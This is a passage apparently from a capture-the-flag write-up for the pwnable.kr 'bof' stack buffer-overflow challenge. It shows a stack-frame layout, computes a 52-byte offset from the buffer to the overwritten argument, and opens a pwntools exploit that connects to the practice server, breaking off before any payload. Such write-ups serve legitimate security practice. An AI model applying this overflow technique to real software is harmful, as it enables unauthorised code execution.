-0000002C overflowme db 32 dup(?) -0000000C var_C dd ? -00000008 db ? ; undefined -00000007 db ? ; undefined -00000006 db ? ; undefined -00000005 db ? ; undefined -00000004 db ? ; undefined -00000003 db ? ; undefined -00000002 db ? ; undefined -00000001 db ? ; undefined +00000000 s db 4 dup(?) +00000004 r db 4 dup(?) +00000008 arg dd ?
0x2c + 0x8 = 0x34 = 52
exp
# coding:utf-8
from pwn import *
#p = process('./bof') p = remote('pwnable.kr', 9000)